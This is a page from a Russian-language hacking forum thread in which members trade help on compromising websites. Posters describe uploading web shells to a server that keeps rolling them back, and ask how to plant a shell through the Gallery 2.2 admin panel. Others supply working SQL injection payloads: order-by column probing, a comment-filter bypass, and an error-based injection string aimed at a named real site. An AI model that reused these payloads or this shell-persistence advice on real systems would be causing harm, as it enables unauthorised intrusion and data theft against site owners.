Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    noviyuser
    работа с постгрес, немного отличается, не всегда требуется подобрать колонки, можно просто составить запрос id=1+and+1=value

    постгре тоже любит подзапросы
     
    _________________________
  2. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Как обойти защиту на сервере от изменения файлов?
    Заливаю шелл он удаляется через неск минут, или изменяю любой файл, и через пару минут он откатуется!
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    возможно это автоматический бекап, или админ не спит там

    вариант то что протроянить скрипты прям из бекапа, если конечно есть права не бекапанные файлы, пробуй найти их
     
    _________________________
  4. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    А если вот посты там создаются или еще что то, оно ж не будет делать бекап?

    адмни отпадает

    Просто рес очень жирный во всех планах.
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    посты сохраняются в базе данных а не в скриптах
    лучше прям забиндится, и нормально анализировать систему
     
    _________________________
  6. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Если кому нибуть не в лом, из знатоков, прошу объяснить новичку элементарную вещь.
    При простом заросе в базу данных типа:
    $db=mysql_query("SELECT * FROM table WHERE id='$_GET['id']' ");
    $db=mysql_fetch_array($db);

    и при вводе в url адреса http://site.ru/index.php?id=1' выдает ошибкуWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in...

    ...и дальше не идет...
    тоесть при вводе http://site.ru/index.php?id=1'+order+by+1--
    все равно выдает ошибку...
    Казалось бы золотая sql'ka, но разобратся с этим ни как не могу.
    Заранее спс!
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://site.ru/index.php?id=1'+order+by+1+--+
     
    1 person likes this.
  8. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    При твоем варианте должно быть MQ = Off.
    Если такое имеется, то
    http://site.ru/index.php?id=1'+order+by+1+--+ то есть запрос становиться таким SELECT * FROM table WHERE id='' order by 1+--+
    Если mq = on - ничего не получиться. получиться так:
    "SELECT * FROM table WHERE id='\' union select ...' и инъекции не будет. Как говорил Dr.Z3r0
     
    #16168 Фараон, 21 Feb 2011
    Last edited: 21 Feb 2011
    2 people like this.
  9. Pulsse

    Pulsse New Member

    Joined:
    8 Feb 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите как залить шелл через админку в Gallery 2.2 (http://gallery.menalto.com/)
     
  10. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Не знаю, что и куда ты там вводишь, но твой скрипт даже не запуститься, потому что он синтаксически неверен.
    Правильно:
    PHP:
    $db=mysql_query("SELECT * FROM table WHERE id=' ".$_GET['id']." ' ");
    $db=mysql_fetch_array($db);
    Эксплуатация:
    HTML:
    1' order by 1,2,3,4,5,6,7,8,9,10-- a
    
    И так далее.

    Ну и magic_quotes должны быть off соответственно.
     
    #16170 h00lyshit!, 21 Feb 2011
    Last edited: 21 Feb 2011
  11. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    1' order by 1,2,3,4,5,6,7,8,9,10-- a

    а 'a' на конце зачем?
     
    #16171 asql, 21 Feb 2011
    Last edited by a moderator: 21 Feb 2011
  12. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Не важно, что там стоит, я просто показал, что после знака комментария должен стоять пробел.
     
    #16172 h00lyshit!, 21 Feb 2011
    Last edited: 21 Feb 2011
  13. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    Warning: include(/var/www/xxxx.com/1\'.php) [function.include]: failed to open stream: No such file or directory in /var/www/xxx/index.php on line 34

    Warning: include() [function.include]: Failed opening '/var/www/xxxxx.com/1\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/xxxx.com/index.php on line 34

    что ето за ошибка обьесните плиз и чт можно зделать?
     
  14. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    local file include (LFI )
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Народ помогите разобраться стакой скулей:
    _http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=-9+union+select+1,2,3-- //выводит Error processing request
    но при group by оприделилось три поля, как понимаю тут фильтрация, и подскажите где можно статейку о более сложных скулях почитать...
     
    _________________________
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    там стоит фильтрация или фаервол какой-нибудь, так что нужно знать как обходить эти фильтры. Тема поднималась сто раз, так что ищем. Ну я думаю если найдёшь и обойдёшь, то узнаешь что там несколько запросов на странице, значит нужен вывод через ошибку, так что ищем сразу же вывод через ошибку
     
    1 person likes this.
  17. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    обходится спокойно, но через юнион селект не крутится
    http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+/*!union*/+select+1,2,3

    так что error based
    http://www.ad1.us/links.php?cat_id=58&cat_name=Web%20Resources&siteid=9+or+1+group+by+concat+(version(),floor(rand(0)*2))having+min(0)+or+1
     
    #16177 freezed, 22 Feb 2011
    Last edited by a moderator: 22 Feb 2011
    2 people like this.
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    есть ли на ломаемых хостах какая нить альтернатива gcc
     
    _________________________
  19. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подскажите если при подставлении кавычки скажем

    something.php?blabla=asd' показывает страницу something.php как эту уязвимость эксплуатировать?
     
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    а с чего ты взял что там уязвимость?
     
    1 person likes this.
Thread Status:
Not open for further replies.